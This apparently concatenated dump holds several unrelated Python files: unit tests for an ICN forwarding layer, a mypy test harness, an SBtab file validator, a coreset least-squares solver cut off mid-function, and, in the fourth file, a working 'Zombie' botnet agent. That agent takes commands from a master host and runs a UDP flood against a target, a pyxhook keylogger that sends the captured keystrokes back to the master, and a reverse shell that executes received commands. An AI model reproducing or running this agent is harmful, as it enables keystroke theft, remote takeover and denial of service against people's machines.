self.icn_layer.cs.add_content_object(c)
self.icn_layer.queue_from_lower.put([from_face_id, i])
try:
to_face_id, data = self.icn_layer.queue_to_lower.get(timeout=2.0)
except:
self.fail()
self.assertEqual(to_face_id, from_face_id)
self.assertEqual(data, c)
self.assertTrue(self.icn_layer.queue_to_higher.empty()) # --> was answered by using Content from cache
def test_ICNLayer_issue_nack_no_content_no_fib_from_lower(self):
"""Test if ICN Layer issues Nack if no content and no fib entry is available from lower"""
self.icn_layer.start_process()
interest = Interest("/test/data")
nack = Nack(interest.name, NackReason.NO_ROUTE, interest=interest)
self.icn_layer.queue_from_lower.put([1, interest])
try:
data = self.icn_layer.queue_to_lower.get(timeout=2.0)
except:
self.fail()
fid = data[0]
packet = data[1]
self.assertEqual(fid, 1)
self.assertEqual(packet, nack)
def test_ICNLayer_issue_nack_no_content_no_fib_from_higher(self):
"""Test if ICN Layer issues Nack if no content and no fib entry is available from higher"""
queue_to_higher = multiprocessing.Queue()
queue_from_higher = multiprocessing.Queue()
self.icn_layer.queue_to_higher = queue_to_higher
self.icn_layer.queue_from_higher = queue_from_higher
self.icn_layer.start_process()
interest = Interest("/test/data")
nack = Nack(interest.name, NackReason.NO_ROUTE, interest=interest)
self.icn_layer.queue_from_higher.put([1, interest])
try:
data = self.icn_layer.queue_to_higher.get(timeout=2.0)
except:
self.fail()
fid = data[0]
packet = data[1]
self.assertEqual(fid, 1)
self.assertEqual(packet, nack)
#TODO CHECK
def test_ICNLayer_handling_nack_no_fib(self):
"""Test if ICN Layer handles a Nack correctly if no fib entry is available"""
self.icn_layer.start_process()
n1 = Name("/test/data")
i1 = Interest(n1)
fid_1 = 1
nack_1 = Nack(n1, NackReason.NO_ROUTE, interest=i1)
self.icn_layer.pit.add_pit_entry(n1, fid_1, -1, i1, False)
self.icn_layer.queue_from_lower.put([2, nack_1])
try:
data = self.icn_layer.queue_to_lower.get(timeout=2.0)
print(data)
except:
self.fail()
self.assertEqual(data[0], fid_1)
self.assertEqual(data[1], nack_1)
#TODO Fix the error
def test_ICNLayer_handling_nack_next_fib(self):
"""Test if ICN Layer handles a Nack correctly if further fib entry is available"""
self.icn_layer.start_process()
n1 = Name("/test/data/d1")
i1 = Interest(n1)
from_fid = 1
to_fib1 = 2
to_fib2 = 3
to_fib3 = 4
nack_1 = Nack(n1, NackReason.NO_ROUTE, interest=i1)
self.icn_layer.pit.add_pit_entry(n1, from_fid, to_fib3, i1, None)
self.icn_layer.pit.add_used_fib_face(n1, [to_fib3])
self.icn_layer.fib.add_fib_entry(Name("/test"), [to_fib1])
self.icn_layer.fib.add_fib_entry(Name("/test/data"), [to_fib2])
self.icn_layer.fib.add_fib_entry(Name("/test/data/d1"), [to_fib3]) #assuming this entry was used first and is active when nack arrives
self.icn_layer.queue_from_lower.put([to_fib3, nack_1])
try:
data = self.icn_layer.queue_to_lower.get(timeout=2.0)
except:
self.fail()
self.assertEqual(data[0], to_fib2)
self.assertEqual(data[1], i1)
#check testing second path
self.icn_layer.queue_from_lower.put([to_fib2, nack_1])
try:
data = self.icn_layer.queue_to_lower.get(timeout=2.0)
except:
self.fail()
self.assertEqual(data[0], to_fib1)
self.assertEqual(data[1], i1)
#check no path left
self.icn_layer.queue_from_lower.put([to_fib1, nack_1])
try:
data = self.icn_layer.queue_to_lower.get(timeout=2.0)
except:
self.fail()
self.assertEqual(data[0], from_fid)
self.assertEqual(data[1], nack_1)
def test_multicast_and_nack_handling(self):
"""Test if a multicast works, and if the nack counter for the multicast works"""
i1 = Interest("/test/data")
n1 = Nack(i1.name, NackReason.NO_CONTENT, i1)
self.icn_layer.start_process()
self.icn_layer.fib.add_fib_entry(i1.name, [2,3,4])
self.icn_layer.queue_from_lower.put([1, i1])
d1 = self.icn_layer.queue_to_lower.get(timeout=2.0)
self.assertEqual([2, i1], d1)
self.assertTrue(self.icn_layer.queue_to_lower.empty())
self.icn_layer.queue_from_lower.put([2, n1])
d2 = self.icn_layer.queue_to_lower.get(timeout=4.0)
print(d2)
self.assertEqual([3, i1], d2)
self.assertTrue(self.icn_layer.queue_to_lower.empty())
self.icn_layer.queue_from_lower.put([3, n1])
try:
d3 = self.icn_layer.queue_to_lower.get(timeout=4.0)
except:
self.fail()
print(d3)
self.assertEqual([4, i1], d3)
##
#
#
# self.assertTrue(self.icn_layer.queue_to_lower.empty())
#
# self.icn_layer.queue_from_lower.put([2, n1])
# d3 = self.icn_layer.queue_to_lower.get(timeout=2.0)
# self.assertEqual([1, n1], d3)
def test_communicating_vessels_forwarding_strategy(self):
"""This function test the whole idea of forwarding strategy with multiple PIT entries
and multiple FIB entries with multiple matches in PIT and FIB and also it checks the NACK handler in case of one face was nacked in a fib entry or all faces
of a fib entry was nacked"""
ab_name = Name("/a/b")
i1 = Interest("/a/b/x")
i2 = Interest("/a/b/y")
i3 = Interest("/a/b/z")
i4 = Interest("/a/b/w")
i5 = Interest("/a/b/k")
i6 = Interest("/x/y")
i7 = Interest("/x")
i8 = Interest("/m/n")
i9 = Interest("/o/p")
n1 = Nack(i1.name, NackReason.NO_CONTENT, i1)
self.icn_layer.start_process()
self.icn_layer.fib.add_fib_entry(ab_name, [1, 2, 3])
# here the fib table has many entries which contains the prefix of ab_name
self.icn_layer.fib.add_fib_entry(i6.name, [1, 4])
self.icn_layer.fib.add_fib_entry(i7.name, [2, 3])
self.icn_layer.fib.add_fib_entry(i8.name, [1, 5])
self.icn_layer.fib.add_fib_entry(i9.name, [5, 3])
#send the first interest ("/a/b/x") with no matching PIT entry. The outgoing face should be "1"
#as it is the first Interest and there is no pending Interests to affect the decision
self.icn_layer.queue_from_lower.put([10, i1])
d1 = self.icn_layer.queue_to_lower.get(timeout=2.0)
pit_entry = self.icn_layer.pit.find_pit_entry(i1.name)
self.assertEqual([1], pit_entry.outgoing_faces)
#send the second Interest ("/a/b/y") while the PIT entry of ("a/b/x") was not removed yet from the PIT
#The interest should be sent to face "2" as the occupancy of face "1" is higher than the occupancy of "2" and "3"
self.icn_layer.queue_from_lower.put([10, i2])
d1 = self.icn_layer.queue_to_lower.get(timeout=2.0)
pit_entry = self.icn_layer.pit.find_pit_entry(i2.name)
self.assertEqual([2], pit_entry.outgoing_faces)
#send bunch of Interests which are ("/x/y"), ("/x"), ("/m/n"),("/o/p"). In this case and because there is no matching entry in PIT for any of them.
# each one will be sent to the first avaialble face in FIB. So i6 will be sent to 1. i7 will be sent to 2...
self.icn_layer.queue_from_lower.put([10, i6])
d1 = self.icn_layer.queue_to_lower.get(timeout=2.0)
self.icn_layer.queue_from_lower.put([10, i7])
d1 = self.icn_layer.queue_to_lower.get(timeout=2.0)
self.icn_layer.queue_from_lower.put([10, i8])
d1 = self.icn_layer.queue_to_lower.get(timeout=2.0)
self.icn_layer.queue_from_lower.put([10, i9])
d1 = self.icn_layer.queue_to_lower.get(timeout=2.0)
# send the second Interest i3 ("/a/b/z") while the PIT entry of ("a/b/x") and ("a/b/y") was not removed yet from the PIT
# The interest should be sent to face "3" as the occupancy of face "1" and face "2" is higher than the occupancy of "3"
self.icn_layer.queue_from_lower.put([10, i3])
d1 = self.icn_layer.queue_to_lower.get(timeout=2.0)
pit_entry = self.icn_layer.pit.find_pit_entry(i3.name)
self.assertEqual([3], pit_entry.outgoing_faces)
# now send an interest i4 (("/a/b/w") while the previous three matching interests still exist in PIT. All faces have equal capacity so it will be sent to the first one.
self.icn_layer.queue_from_lower.put([10, i4])
d1 = self.icn_layer.queue_to_lower.get(timeout=2.0)
pit_entry = self.icn_layer.pit.find_pit_entry(i4.name)
self.assertEqual([1], pit_entry.outgoing_faces)
# we are removing i4 and i1 from the PIT table
self.icn_layer.pit.remove_pit_entry(i4.name)
self.icn_layer.pit.remove_pit_entry(i1.name)
# senf=d i5 while i2 and i3 still exist in PIT and they match i5. So the interest will be sent to face 1 because i2 is sent to 2 and i3 is sent to 3 so 2,3 have higher occupancy than 1
self.icn_layer.queue_from_lower.put([10, i5])
d1 = self.icn_layer.queue_to_lower.get(timeout=2.0)
pit_entry = self.icn_layer.pit.find_pit_entry(i5.name)
self.assertEqual([1], pit_entry.outgoing_faces) |
"""Test cases for running mypy programs using a Python interpreter.
Each test case type checks a program then runs it using Python. The
output (stdout) of the program is compared to expected output. Type checking
uses full builtins and other stubs.
Note: Currently Python interpreter paths are hard coded.
Note: These test cases are *not* included in the main test suite, as including
this suite would slow down the main suite too much.
"""
import os
import os.path
import re
import sys
from tempfile import TemporaryDirectory
import pytest # type: ignore # no pytest in typeshed
from typing import List
from mypy.defaults import PYTHON3_VERSION
from mypy.test.config import test_temp_dir
from mypy.test.data import DataDrivenTestCase, DataSuite
from mypy.test.helpers import assert_string_arrays_equal, run_command
from mypy.util import try_find_python2_interpreter
from mypy import api
# Path to Python 3 interpreter
python3_path = sys.executable
program_re = re.compile(r'\b_program.py\b')
class PythonEvaluationSuite(DataSuite):
files = ['pythoneval.test',
'python2eval.test',
'pythoneval-asyncio.test']
cache_dir = TemporaryDirectory()
def run_case(self, testcase: DataDrivenTestCase) -> None:
test_python_evaluation(testcase, os.path.join(self.cache_dir.name, '.mypy_cache'))
def test_python_evaluation(testcase: DataDrivenTestCase, cache_dir: str) -> None:
"""Runs Mypy in a subprocess.
If this passes without errors, executes the script again with a given Python
version.
"""
assert testcase.old_cwd is not None, "test was not properly set up"
# TODO: Enable strict optional for these tests
mypy_cmdline = [
'--show-traceback',
'--no-site-packages',
'--no-strict-optional',
'--no-silence-site-packages',
]
py2 = testcase.name.lower().endswith('python2')
if py2:
mypy_cmdline.append('--py2')
interpreter = try_find_python2_interpreter()
if interpreter is None:
# Skip, can't find a Python 2 interpreter.
pytest.skip()
# placate the type checker
return
else:
interpreter = python3_path
mypy_cmdline.append('--python-version={}'.format('.'.join(map(str, PYTHON3_VERSION))))
# Write the program to a file.
program = '_' + testcase.name + '.py'
program_path = os.path.join(test_temp_dir, program)
mypy_cmdline.append(program_path)
with open(program_path, 'w') as file:
for s in testcase.input:
file.write('{}\n'.format(s))
mypy_cmdline.append('--cache-dir={}'.format(cache_dir))
output = []
# Type check the program.
out, err, returncode = api.run(mypy_cmdline)
# split lines, remove newlines, and remove directory of test case
for line in (out + err).splitlines():
if line.startswith(test_temp_dir + os.sep):
output.append(line[len(test_temp_dir + os.sep):].rstrip("\r\n"))
else:
output.append(line.rstrip("\r\n"))
if returncode == 0:
# Execute the program.
returncode, interp_out = run_command([interpreter, program])
output.extend(interp_out)
# Remove temp file.
os.remove(program_path)
assert_string_arrays_equal(adapt_output(testcase), output,
'Invalid output ({}, line {})'.format(
testcase.file, testcase.line))
def adapt_output(testcase: DataDrivenTestCase) -> List[str]:
"""Translates the generic _program.py into the actual filename."""
program = '_' + testcase.name + '.py'
return [program_re.sub(program, line) for line in testcase.output]
|
<gh_stars>0
#!/usr/bin/env python
"""
SBtab Validator
===============
Python script that validates SBtab files
See specification for further information.
"""
try:
from . import SBtab
from . import tablibIO
from . import misc
except:
import SBtab
import tablibIO
import misc
import re
import collections
import sys
import os
class SBtabError(Exception):
'''
Base class for errors in the SBtab validation class.
'''
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class ValidateTable:
'''
Validator (version 0.9 06/10/2015).
Checks SBtab file and SBtab object.
'''
def __init__(self, sbtab, sbtab_name, def_table=None):
'''
Initialises validator and starts check for file and table format.
Parameters
----------
table: SBtab object
SBtab data file as SBtab object
sbtab_name: str
File path of the SBtab data file
def_table: SBtab object
SBtab definition table as SBtab object
'''
# initialize warning string
self.warnings = []
# define self variables
self.sbtab = sbtab
self.filename = sbtab_name
# read definition table
self.read_definition(def_table)
# create set of valid table types
self.allowed_table_types = list(set([row[2] for row in self.definitions[2:][0]]))
# create dict of valid column names per table type
self.allowed_columns = {}
for table_type in self.allowed_table_types:
self.allowed_columns[table_type] = [row[0] for row in self.definitions[2:][0] if row[2] == table_type]
# check file format and header row
self.check_general_format()
self.column2format = {}
defs = self.definitions[2]
for row in defs:
if row[2] == self.sbtab.table_type:
self.column2format[row[0]] = row[3]
# remove empty column headers
columns = []
for element in self.sbtab.columns:
if element == '': pass
else: columns.append(element)
self.sbtab.columns = columns
# check SBtab object for validity
self.check_table_content()
def read_definition(self, def_table):
'''
read the required definition file; either it is provided by the user
or the default definition file is read in; otherwise program exit
'''
# read in provided definition table or open default
if def_table:
try: self.definitions = def_table.sbtab_list
except:
print('''Definition file could not be loaded, so the validation
could not be started. Please provide definition file
as argument''')
sys.exit()
else:
try:
d = os.path.dirname(os.path.abspath(__file__)) + '/files/default_'\
'files/definitions.tsv'
def_file = open(d, 'r')
def_table = def_file.read()
sbtab_def = SBtab.SBtabTable(def_table, d)
self.definitions = sbtab_def.sbtab_list
except:
print('''Definition file could not be loaded, so the validation
could not be started. Please provide definition file
as argument''')
sys.exit()
def check_general_format(self):
'''
Validates format of SBtab file, checks file format and header row.
'''
header = self.sbtab.header_row
# Construct consistent quotes to make the header readable
quotes = ['"', '\xe2\x80\x9d', '\xe2\x80\x98', '\xe2\x80\x99',
'\xe2\x80\x9b', '\xe2\x80\x9c', '\xe2\x80\x9f',
'\xe2\x80\xb2', '\xe2\x80\xb3', '\xe2\x80\xb4',
'\xe2\x80\xb5', '\xe2\x80\xb6', '\xe2\x80\xb7']
for quote in quotes:
try: header = header.replace(quote, "'")
except: pass
# check for valid header row
if not header.startswith('!!'):
self.warnings.append('''Error: The header row of the table does not
start with "!!SBtab". This file cannot be v
alidated.''')
if not re.search("TableType='([^']*)'", header):
self.warnings.append('''Error: The attribute TableType is not defin
ed in the SBtab table; This file cannot be
validated.''')
if not re.search("TableName='([^']*)'", header):
self.warnings.append('''Warning: The (optional) attribute TableName
is not defined in the SBtab table.''')
# check columns for preceding exclamation mark
for column in self.sbtab.columns:
if not column.startswith('!') and column != '':
self.warnings.append('''Warning: Column %s does not start with
an exclamation mark. It will not be processed.''' % (column))
# check if there are value rows
if len(self.sbtab.value_rows) < 1:
self.warnings.append('''Warning: Column %s does not start with
an exclamation mark. It will not be processed.''' % (column))
# check if length of value rows correspond to amount of columns
for vr in self.sbtab.value_rows:
if len(vr) != len(self.sbtab.columns):
self.warnings.append('''Warning: The length of row %s does not
correspond to the amount of columns,
which is %s.''' % (vr, len(self.sbtab.columns)))
def check_table_content(self):
'''
Validates the mandatory format of the SBtab in accordance to the
TableType attribute.
'''
# 1st: check validity of table_type and save table type for later tests
if self.sbtab.table_type not in self.allowed_table_types:
self.warnings.append('Warning: The SBtab file has an invalid Tabl'\
'eType in its header: %s. Thus, the validity'\
' of its columns cannot'\
' be checked' % (self.sbtab.table_type))
return
# 2nd: very important: check if the identifiers start with a digit;
# this is not allowed in SBML!
# also check if the identifiers are unique throughout the table
unique = []
for row in self.sbtab.value_rows:
try: identifier = row[self.sbtab.columns_dict['!ID']]
except: break
if identifier not in unique: unique.append(identifier)
else:
warning = 'Warning: There is an identifier that is not unique'\
'. Please change that: %s' % identifier
self.warnings.append(warning)
try:
int(identifier[0])
self.warnings.append('Warning: There is an identifier that st'\
'arts with a digit; this is not permitte'\
'd for the SBML conversion:'\
'%s' % (identifier))
except: pass
# if the SBtab is TableType="Reaction", check if there is at least a
# SumFormula or an identifier column to characterise the reaction
if self.sbtab.table_type == 'Reaction':
if '!ReactionFormula' not in self.sbtab.columns_dict:
ident = False
for it in self.sbtab.columns_dict:
if it.startswith('!Identifier'):
ident = True
break
if not ident:
warning = 'Error: A Reaction SBtab needs at least a colum'\
'n !ReactionFormula or an !Identifier column to'\
'be characterised.'
self.warnings.append(warning)
if self.sbtab.table_type == 'Quantity':
if '!Unit' not in self.sbtab.columns_dict:
warning = 'Error: A Quantity SBtab requires the column'\
' "'"Unit"'". Please add this column to the'\
' SBtab file.'
self.warnings.append(warning)
# 3rd: check the validity of the given column names
for column in self.sbtab.columns:
if column.replace('!', '') not in self.allowed_columns[self.sbtab.table_type] \
and ('Identifiers:') not in column \
and ('ID:urn.') not in column:
self.warnings.append('Warning: The SBtab file has an unknown '\
'column: %s.\nPlease use only supported '\
'column types!' % (column))
# 4th: check the length of the different rows
for row in self.sbtab.value_rows:
# check the rows for entries starting with + or -
if '!ID' in self.sbtab.columns_dict:
if str(row[self.sbtab.columns_dict['!ID']]).startswith('+') \
or str(row[self.sbtab.columns_dict['!ID']]).startswith('-'):
self.warnings.append('Warning: An identifier for a data r'\
'ow must not begin with "+" or "-": '\
'\n%s''' % (row))
if '!ReactionFormula' in self.sbtab.columns_dict:
if '<=>' not in row[self.sbtab.columns_dict['!ReactionFormula']]:
warning = 'There is a sum formula that does not adhere to'\
' the sum formula syntax from the SBtab specifi'\
'cation: %s' % (str(row[self.sbtab.columns_dict['!ReactionFormula']]))
self.warnings.append(warning)
for i, entry in enumerate(row):
if entry == '': continue
if self.sbtab.columns[i][1:].startswith('Identifier'):
req_format = 'string'
else:
try:
req_format = self.column2format[self.sbtab.columns[i][1:]]
except: continue
if req_format == 'Boolean':
if entry != 'True' and entry != 'False' and entry != 'TRUE' \
and entry != 'FALSE' and entry != '0' and entry != '1':
warning = 'Warning: The column %s holds a value that '\
'does not conform with the assigned column '\
'format %s: %s' % (self.sbtab.columns[i][1:],
req_format, entry)
self.warnings.append(warning)
elif req_format == 'float':
try: float(entry)
except:
warning = 'Warning: The column %s holds a value that '\
'does not conform with the assigned column '\
'format %s: %s' % (self.sbtab.columns[i][1:],
req_format, entry)
self.warnings.append(warning)
elif req_format == '{+,-,0}':
if entry != '+' and entry != '-' and entry != '0':
warning = 'Warning: The column %s holds a value that '\
'does not conform with the assigned column '\
'format %s: %s' % (self.sbtab.columns[i][1:],
req_format, entry)
self.warnings.append(warning)
# 5th: are there duplicate columns?
for column in collections.Counter(self.sbtab.columns).items():
if column[1] > 1:
self.warnings.append('''Warning: There was a duplicate column i
n this SBtab file. Please remove it:
%s''' % (str(column[0])))
def return_output(self):
'''
Returns the warnings from the validation process.
'''
return self.warnings
if __name__ == '__main__':
try: sys.argv[1]
except:
print('''You have not provided input arguments. Please start the script
by also providing an SBtab file and the required definition f
ile: >python validatorSBtab.py SBtab.csv definition.tsv''')
sys.exit()
file_name = sys.argv[1]
sbtab_file_o = open(file_name, 'r')
sbtab_file = sbtab_file_o.read()
sbtab_file_o.close()
delimiter = misc.check_delimiter(sbtab_file)
sbtab_tablib = tablibIO.importSetNew(sbtab_file, file_name, delimiter)
try:
default_def = sys.argv[2]
def_file = open(default_def, 'r')
def_tab = def_file.read()
def_file.close()
except:
def_tab = None
validator_output = []
Validate_file_class = ValidateFile(sbtab_file, file_name)
validator_output.append(Validate_file_class.return_output())
Validate_table_class = ValidateTable(sbtab_file, file_name, def_tab)
validator_output.append(Validate_table_class.return_output())
warned = False
for warning in validator_output:
if warning != []:
print('WARNINGS: ', warning)
warned = True
if not warned:
print('The SBtab file is valid.')
|
import sys
import socket
import subprocess
import pyxhook
import time
MASTER_IP = "127.0.0.1"
MASTER_PORT = 6000
ZOMB_PORT = int(sys.argv[1])
log_file='/home/aman/Desktop/file.log'
keys = ""
last_key = ''
#this function is called everytime a key is pressed.
def OnKeyPress(event):
global keys
global last_key
keys += event.Key
keys += " "
last_key = event.Key
class Zombie:
def __init__(self,conn):
self.conn = conn
#Denial of Service Attack
def dos(self,dest_ip,dest_port):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) #Create socket
print "dos connected..."
except socket.error, msg :
print 'Failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
return
print "starting dos..."
for i in xrange(10):
sock.sendto("ZOMB-("+MASTER_IP+","+str(ZOMB_PORT)+")",(dest_ip,dest_port)) #Send packets
sock.sendto("dos finished...",(MASTER_IP,MASTER_PORT))
sock.close() #Close socket
#Reverse Shell
def reverse_shell(self):
print "Starting reverse shell...\n"
while True:
cmd = self.conn.recv(1024) #Receive shell command
print cmd
if cmd == 'exit': #Break if user wished to exit
print "Exiting...\n"
break
# do shell command
new_process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# read output
stdout_value = new_process.stdout.read() + new_process.stderr.read()
# send back output
self.conn.sendto(stdout_value,(MASTER_IP,MASTER_PORT))
#Keylog for a time period and send data back to master
def keylog(self,t):
global keys
global last_key
keys = ""
last_key = ''
print "initializing keyboard hook..."
#instantiate HookManager class
hook=pyxhook.HookManager()
#listen to all keystrokes
hook.KeyDown=OnKeyPress
#hook the keyboard
hook.HookKeyboard()
#start the session
hook.start()
print "starting key logging..."
start = time.time()
while time.time() - start < t:
if last_key=="grave": #the grave key (`)
break
hook.cancel()
print "stopped key logging..."
keys = keys + "`127.0.0.1`" + str(ZOMB_PORT) #hard coded ip and port
print "sending key data..."
self.conn.sendto(keys,(MASTER_IP,MASTER_PORT))
#Parse masters command
def parse_cmd(self,p):
# packet = conn.recv(1024)
packet = p.split(',')
#packet = "DDOS,DEST_IP,DEST_PORT"
if packet[0] == "DDOS":
self.dos(packet[1],int(packet[2]))
#packet = "KEYL,TIME"
#TIME is in seconds
elif packet[0] == "KEYL":
self.keylog(int(packet[1]))
#packet = "RVSH"
elif packet[0] == "RVSH":
self.conn.sendto("RVSH",(MASTER_IP,MASTER_PORT)) #Tell master to start sending commands
self.reverse_shell()
if __name__ == '__main__':
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) #Create socket
s.bind(('',ZOMB_PORT)) #Bind to port
print 'Socket created'
except socket.error, msg :
print 'Failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
sys.exit()
zomb = Zombie(s)
while True:
print "\nwaiting for commands..."
#Receive command
data, addr = zomb.conn.recvfrom(1024)
print "reveived: " + data + " from: " + addr[0] + " " + str(addr[1])
if addr[0] == MASTER_IP:
print "Parsing..."
zomb.parse_cmd(data)
zomb.conn.close()
|
"""*****************************************************************************************
MIT License
Copyright (c) 2019 <NAME>, <NAME>, <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
*****************************************************************************************"""
####################################### NOTES ############################################
# - Please cite our paper when using the code:
# "Fast and Accurate Least-Mean-Squares Solvers" (NIPS19' - Oral presentation)
# <NAME> and <NAME> and <NAME>
#
# - Faster algorithm for large values of the dimension d will be published soon.
##########################################################################################
import numpy as np
from sklearn import linear_model
from sklearn.model_selection import KFold
import time
import math
def Caratheodory(P, u, dtype='float64'):
"""
Implementation of the Caratheodory Theorem(1907)
input: a numpy array P containing n rows (points), each of size d, and a positive vector of weights u (that sums to 1)
output:a new vector of weights new_u that satisfies :
1. new_u is positive and sums to 1
2. new_u has at most d+1 non zero entries
3. the weighted sum of P and u (input) is the same as the weighted sum of P and new_u (output)
computation time: O(n^2d^2)
"""
while 1:
n = np.count_nonzero(u)
d = P.shape[1]
u_non_zero = np.nonzero(u)
if n <= d + 1:
return u
A = P[u_non_zero]
reduced_vec = np.outer(A[0], np.ones(A.shape[0]-1, dtype = dtype))
A = A[1:].T - reduced_vec
_, _, V = np.linalg.svd(A, full_matrices=True)
v=V[-1]
v = np.insert(v, [0], -1 * np.sum(v))
idx_good_alpha = np.nonzero(v > 0)
alpha = np.min(u[u_non_zero][idx_good_alpha]/v[idx_good_alpha])
w = np.zeros(u.shape[0] , dtype = dtype)
tmp_w = u[u_non_zero] - alpha * v
tmp_w[np.argmin(tmp_w)] = 0.0
w[u_non_zero] = tmp_w
w[u_non_zero][np.argmin(w[u_non_zero] )] = 0
u = w
def Fast_Caratheodory(P,u,coreset_size, dtype = 'float64'):
"""
Our fast and accurate implementation of Caratheodory's Theorem
Input: a numpy array P containing n rows (points), each of size d, and a positive vector of weights u (if u does not
sum to 1, we first normalize u by its sum, then multiply u back by its original sum before returning it)
Output: a new vector of positive weights new_u that satisfies :
1. new_u has at most d+1 non zero entries
2. the weighted sum of P and u (input) is the same as the weighted sum of P and new_u (output)
Computation time: O(nd+logn*d^4)
"""
d = P.shape[1]
n = P.shape[0]
m = 2*d + 2
if n <= d + 1:
return u.reshape(-1)
u_sum = np.sum(u)
u = u/u_sum
chunk_size = math.ceil(n/m)
current_m = math.ceil(n/chunk_size)
add_z = chunk_size - int (n%chunk_size)
u = u.reshape(-1,1)
if add_z != chunk_size:
zeros = np.zeros((add_z, P.shape[1]), dtype = dtype)
P = np.concatenate((P, zeros))
zeros = np.zeros((add_z, u.shape[1]), dtype = dtype)
u = np.concatenate((u, zeros))
idxarray = np.array(range(P.shape[0]) )
p_groups = P.reshape(current_m, chunk_size, P.shape[1])
u_groups = u.reshape(current_m, chunk_size)
idx_group = idxarray.reshape(current_m, chunk_size)
u_nonzero = np.count_nonzero(u)
if not coreset_size:
coreset_size = d+1
while u_nonzero > coreset_size:
groups_means = np.einsum('ijk,ij->ik',p_groups, u_groups)
group_weigts = np.ones(groups_means.shape[0], dtype = dtype)*1/current_m
Cara_u_idx = Caratheodory(groups_means , group_weigts,dtype = dtype )
IDX = np.nonzero(Cara_u_idx)
new_P = p_groups[IDX].reshape(-1,d)
subset_u = (current_m * u_groups[IDX] * Cara_u_idx[IDX][:, np.newaxis]).reshape(-1, 1)
new_idx_array = idx_group[IDX].reshape(-1,1)
##############################################################################3
u_nonzero = np.count_nonzero(subset_u)
chunk_size = math.ceil(new_P.shape[0]/ m)
current_m = math.ceil(new_P.shape[0]/ chunk_size)
add_z = chunk_size - int(new_P.shape[0] % chunk_size)
if add_z != chunk_size:
new_P = np.concatenate((new_P, np.zeros((add_z, new_P.shape[1]), dtype = dtype)))
subset_u = np.concatenate((subset_u, np.zeros((add_z, subset_u.shape[1]),dtype = dtype)))
new_idx_array = np.concatenate((new_idx_array, np.zeros((add_z, new_idx_array.shape[1]),dtype = dtype)))
p_groups = new_P.reshape(current_m, chunk_size, new_P.shape[1])
u_groups = subset_u.reshape(current_m, chunk_size)
idx_group = new_idx_array.reshape(current_m , chunk_size)
###########################################################
new_u = np.zeros(n)
subset_u = subset_u[(new_idx_array < n)]
new_idx_array = new_idx_array[(new_idx_array < n)].reshape(-1).astype(int)
new_u[new_idx_array] = subset_u
return u_sum * new_u
def linregcoreset(P, u, b=None, c_size=None, dtype='float64'):
"""
This function computes a coreset for linear regression.
Input: a numpy array P containing n rows (points), each of size d, a positive vector of weights u of size n, a labels
vector b of size n, coreset size c_size (not required).
Output: a new numpy array new_P containing the coreset points in its rows and a new vector new_u of positive weights,
and a new vector of labels new_b for the coreset. The output satisfies for every vector x that:
||sqrt(u.transpose())*(Px-b)||^2 = ||sqrt(new_u.transpose())*(new_Px-new_b)||^2
i.e., the output of a call to linearRegression with the original input or with the coreset is the same.
Computation time: O(nd^2+logn*d^8)
"""
if b is not None:
P_tag = np.append(P, b, axis=1)
else:
P_tag = P
n_tag = P_tag.shape[0]; d_tag = P_tag.shape[1]
P_tag = P_tag.reshape(n_tag, d_tag, 1)
P_tag = np.einsum("ikj,ijk->ijk",P_tag ,P_tag)
P_tag = P_tag.reshape(n_tag, -1)
n_tag = P_tag.shape[0]; d_tag = P_tag.shape[1]
coreset_weigts = Fast_Caratheodory(P_tag.reshape(n_tag,-1), u, c_size, dtype=dtype)
new_idx_array = np.nonzero(coreset_weigts)
coreset_weigts = coreset_weigts[new_idx_array]
if b is not None:
return P[new_idx_array], coreset_weigts.reshape(-1), b[new_idx_array]
else:
return P[new_idx_array], coreset_weigts.reshape(-1)
def stream_coreset(P, u, b, folds=None, dtype='float64'):
"""
This function computes a coreset for LMS solvers that use k-fold cross validation. It partitions the data into "folds"
parts, and computes a coreset for every part using the function linregcoreset.
Input: a numpy array P containing n rows (points), each of size d, a positive vector of weights u of size n, a labels
vector b of size n, and the number of folds used in the cross validation.
Output: a new numpy array new_P containing the coreset points in its rows and a new vector new_u of positive weights,
and a new vector of labels new_b for the coreset. The output satisfies for every vector x that:
||sqrt(u.transpose())*(Px-b)||^2 = ||sqrt(new_u.transpose())*(new_Px-new_b)||^2
i.e., the output of a call to linearRegression with the original input or with the coreset is the same.
Computation time: O(nd^2+logn*d^8)
"""
if folds is None:
return linregcoreset(P, u, b, dtype=dtype)
m = int(P.shape[0] / folds)
d = P.shape[1]
size_of_coreset = ((d+1)*(d+1)+1)
batches = folds
cc, uc, bc = linregcoreset(P[0:m], u[0:m], b[0:m], dtype=dtype)
if cc.shape[0] < size_of_coreset and folds:
add_z = size_of_coreset - cc.shape[0]
zeros = np.zeros((add_z, cc.shape[1]), dtype=dtype)
cc = np.concatenate((cc, zeros))
zeros = np.zeros((add_z), dtype=dtype)
uc = np.concatenate((uc, zeros))
zeros = np.zeros((add_z, bc.shape[1]), dtype=dtype)
bc = np.concatenate((bc, zeros))
for batch in range(1, batches):
coreset, new_u, new_b = linregcoreset(P[batch*m:(batch+1)*m], u[batch*m:(batch+1)*m], b[batch*m:(batch+1)*m], dtype=dtype)
if coreset.shape[0] < size_of_coreset and folds:
add_z = size_of_coreset - coreset.shape[0]
